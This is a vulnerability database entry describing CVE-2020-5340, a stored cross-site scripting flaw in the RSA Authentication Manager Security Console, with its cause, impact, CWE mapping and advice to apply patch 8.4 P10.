CVE-2020-5340 in RSA Authentication Manager
Summary
by MITRE
RSA Authentication Manager versions prior to 8.4 P10 contain a stored cross-site scripting vulnerability in the Security Console. A malicious RSA Authentication Manager Security Console administrator with advanced privileges could exploit this vulnerability to store arbitrary HTML or JavaScript code through the Security Console web interface. When other Security Console administrators attempt to change the default security domain mapping, the injected scripts could potentially be executed in their browser.
Be aware that VulDB is the high quality source for vulnerability data.
Analysis
by VulDB Data Team • 05/10/2025
The vulnerability identified as CVE-2020-5340 represents a critical stored cross-site scripting flaw within RSA Authentication Manager versions earlier than 8.4 Patch 10. This security weakness exists within the Security Console web interface component of the authentication platform, which serves as the primary administrative interface for managing authentication policies and user configurations. The flaw stems from inadequate input validation and output encoding mechanisms that fail to properly sanitize user-supplied data before storing and subsequently rendering it within the web application's user interface. The vulnerability specifically impacts the default security domain mapping configuration functionality where administrative users can manipulate security domain associations.
The technical exploitation of this vulnerability requires a malicious administrator with advanced privileges to inject malicious code through the Security Console web interface. This stored XSS vulnerability operates by allowing an attacker to inject HTML or JavaScript payloads that persist within the application's database or storage mechanisms. When legitimate administrators navigate to the default security domain mapping configuration page, the malicious code gets executed within their browser context, potentially enabling the attacker to perform unauthorized actions on behalf of the compromised administrators. The attack vector leverages the trust relationship between the web application and its users, where the injected scripts execute in the context of the authenticated user's session.
The operational impact of this vulnerability extends beyond simple script execution, as it can enable attackers to escalate privileges, access sensitive administrative functions, or steal session tokens from other administrators. The compromised authentication environment creates a significant risk for organizations relying on RSA Authentication Manager for their security infrastructure, potentially allowing attackers to manipulate authentication policies, modify user access rights, or gain unauthorized access to protected systems. This vulnerability particularly affects organizations where multiple administrators share the Security Console interface, as any malicious actor with sufficient privileges can establish a persistent threat vector that affects all users who interact with the vulnerable configuration page.
Organizations should immediately apply the vendor-provided patch for RSA Authentication Manager version 8.4 P10 to remediate this vulnerability. The patch addresses the input validation and output encoding deficiencies that enable the stored XSS attack. Security administrators should also implement additional monitoring and logging controls to detect unauthorized administrative activities within the Security Console environment. The vulnerability aligns with CWE-79, which specifically addresses cross-site scripting flaws, and represents a significant concern within the ATT&CK framework under the T1078 technique for Valid Accounts, as it enables attackers to leverage compromised administrative privileges. Organizations should conduct thorough security assessments of their RSA Authentication Manager environments to identify any potential exploitation attempts and ensure proper access controls are implemented to limit administrative privileges to only essential personnel.